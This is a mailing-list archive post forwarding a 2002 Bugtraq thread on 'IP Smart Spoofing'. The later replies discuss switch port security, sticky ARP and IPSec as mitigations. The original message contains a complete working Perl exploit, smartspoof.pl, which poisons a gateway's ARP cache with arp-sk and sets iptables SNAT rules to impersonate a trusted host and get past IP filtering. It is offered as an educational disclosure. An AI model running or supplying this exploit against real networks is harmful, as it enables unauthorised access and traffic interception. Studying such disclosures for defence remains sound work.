[GTER] Fw: Exploit code for IP Smart Spoofing
Giordani Rodrigues
giordani at infoguerra.com.br
Thu Nov 14 16:26:00 -02 2002
É provável que os integrantes da lista já tenham lido na Bugtraq, mas como o
assunto tem gerado algumas mensagens aqui, resolvi transcrever a thread.
[]s
Giordani.
----- Original Message -----
From: "Stephen Gill" <gillsr at yahoo.com>
To: "'Laurent Licour'" <llicour at althes.fr>; <bugtraq at securityfocus.com>
Sent: Thursday, November 14, 2002 1:09 PM
Subject: RE: Exploit code for IP Smart Spoofing
Laurent,
Thanks for your note. In reality IP Smartspoofing is no different than
ARP cache poisoning so I'm not entirely sure why a new name was
"invented". In this particular case one is able to prevent the
following:
- key ports and corresponding MAC entries are hardcoded and secured (ie
gateways). If there is a MAC violation, this is logged and the port is
shut down. 9 times out of 10 if someone is performing ARP spoofing they
will go for a device that is best connected so consider this a fly trap.
- host ports are protected by only allowing one MAC address on a port
at any given time with a lag of 5 minutes for timeout. Yes a station
can change its hardcoded MAC. This will allow them to see at most the
traffic of one other host on the switch. Not perfect, but the odds are
greatly reduced.
A couple of ways that come to mind for having complete protection are:
- have a method of detecting duplicate MAC addresses on a switch
- enable "sticky" ARP. This will keep end stations from being able to
change their MAC address, but at a potentially high administrative
burden. I'll make a note of this option in the doc.
Cheers,
-- steve
-----Original Message-----
From: Laurent Licour [mailto:llicour at althes.fr]
Sent: Thursday, November 14, 2002 3:56 AM
To: bugtraq at securityfocus.com
Cc: 'Stephen Gill'
Subject: RE: Exploit code for IP Smart Spoofing
Your document is quite usefull, but there is no way to protect against
IP smartspoofing with a switch.
Smartspoofing use ARP cache poisonning of hosts.
Using a switch, you can only protect against MAC spoofing as describe in
your document.
You can also detect and refuse the plug of a new host on your network.
But
as it is possible
to change the MAC address of hosts (at least linux and windows 2000),
this
protection is not very strong.
You just have to replace a host by another.
One way to protect with switchs could be the use of switchs that are
able to
create
their CAM entry with the PORT, the MAC and the IP. (against PORT and MAC
only for now)
I think that only layer 3 switch are able to do such work. I have
however no
specific information
about which switch support this feature.
Nortel Passeport 8600 is supposed to do this with the IP filter feature
(something like an ACL
associated with each PORT)
In any case, this could protect only a LAN. If you put a source IP
filtering
rule IP that allows
an external IP, you have no way to detect a spoofing connexion. Only
cryptography can help you
(IPSec...)
Regards
Laurent Licour
llicour at althes.fr
-----Message d'origine-----
De : Stephen Gill [mailto:gillsr at yahoo.com]
Envoyé : mercredi 13 novembre 2002 20:33
À : 'Laurent Licour'; bugtraq at securityfocus.com
Objet : RE: Exploit code for IP Smart Spoofing
In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines. The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.
http://www.qorbit.net/documents/catalyst-secure-template.pdf
http://www.qorbit.net/documents/catalyst-secure-template.htm
Comments or suggestions welcome.
-- steve
-----Original Message-----
From: Laurent Licour [mailto:llicour at althes.fr]
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraq at securityfocus.com'
Subject: Exploit code for IP Smart Spoofing
Hello
As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
a
new method for IP Spoofing, allowing full-connexion from any client
software.
The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method
The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz
These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
Exploit Code (perl source) :
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose
only
#
# Laurent Licour 28/10/02
# llicour at althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool
(www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)
use strict;
use Getopt::Long;
use NetAddr::IP;
sub get_ip_next_hop
{
my ($ip0, $int) =3D @_;
my $ip=3Dnew NetAddr::IP $ip0;
=20
open(ROUTE, "route -n |");
<ROUTE>; <ROUTE>;
my $gateway=3D"";
my $masklen; my @fields; my $line; my $entry;
while($line =3D <ROUTE>)
{
@fields =3D split / +/, $line;
$entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
if ($entry->contains($ip))
{
if (($gateway eq "") or ($masklen < $entry->masklen()))
{
$gateway =3D $fields[1];
$masklen =3D $entry->masklen();
$$int =3D $fields[7];
chop $$int;
}
}
}
die "Error : No route for $ip \n" if ($gateway eq "");
$gateway=3D$ip->addr() if ($gateway eq "0.0.0.0");
return($gateway);
}
sub get_mac
{
my $ip=3Dshift;
my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
system($cmd);
$cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
my $mac=3D`$cmd`;
chop($mac);
return($mac);
}
sub usage
{
print "Start/Stop de smartspoofing\n\n";
print "This is the proof of concept of the smartspoofing technique\n";
print "(visit
http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
print "\n";
print "You only have to specify :\n";
print " -D : address of the filtering equipement to connect to\n";
print " -S : address of the trusted host to spoof\n";
print "\n";
print "Then, you only need to launch your favorite client software
from
this host\n";
print "or any host behind this (because it is now a router)\n";
print "\n";
print "This script is provided as proof of concept for educational
purpose
only.\n";
print "\n";
exit 0;
}
my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
<\@=
IP
source> -start|-stop\n";
my $ver =3D "smartspoof.pl v1.0 28/10/02\n";
my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);
Getopt::Long::GetOptions(
"D=3Ds" =3D> \$ipdst,
"S=3Ds" =3D> \$ipsrc,
"i=3Ds" =3D> \$interface,
"v" =3D> \$version,
"h" =3D> \$help,
"start" =3D> \$start,
"stop" =3D> \$stop
) or die $syntax;
usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;
my $cmd;
my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");
if ($start)
{
print "Activate IP Forwarding\n";
system("echo 1 > /proc/sys/net/ipv4/ip_forward");
print "Activate Arp fillup on $ipsrc\n";
system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");
print "Set NAT rule on iptables\n";
$cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT
--=
to
$ipsrc";
system($cmd);
print "Desactivate ICMP Redirect\n";
system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j
DROP");
print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
$cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D
$ipdst_next_hop -c 1 >/dev/null 2>&1";
system($cmd);
$cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
-D
$ipdst_next_hop >/dev/null 2>&1 &";
system($cmd);
}
elsif ($stop)
{
print "Suppress Arp fillup on $ipsrc\n";
system("killall arp-fillup");
print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop\n";
system("killall arp-sk");
my $mac=3Dget_mac($ipsrc_next_hop);
$cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
system($cmd);
print "Clear iptables rules\n";
system("service iptables stop");
system("service iptables start");
print "Desactivate ip forwarding\n";
system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}
Regards
Laurent Licour
mailto:llicour at althes.fr
Althes
http://www.althes.fr
=20
---------------------------------------------------------------*
* Cet e-mail et toutes les pièces jointes sont destinés aux *
* seules personnes auxquelles ils sont spécifiquement adressés *
* et n'engagent que le signataire de ces documents et non la *
* structure dont il dépend. *
* Leur existence et leur contenu ont un caractère confidentiel. *
* Toute utilisation ou diffusion non autorisée est interdite. *
* Si vous avez reçu cet e-mail ou si vous détenez sans en être *
* le destinataire, nous vous demandons de bien vouloir nous en *
* informer immédiatement. *
* Cette note assure que ce message a été contrôlé et ne *
* comprenait aucun virus connu à ce jour, néanmoins tout *
* message électronique est susceptible d'altération. *
* Nous déclinons toute responsabilité au titre de ce message *
* s'il a été altéré, déformé ou falsifié. *
*---------------------------------------------------------------*
More information about the gter
mailing list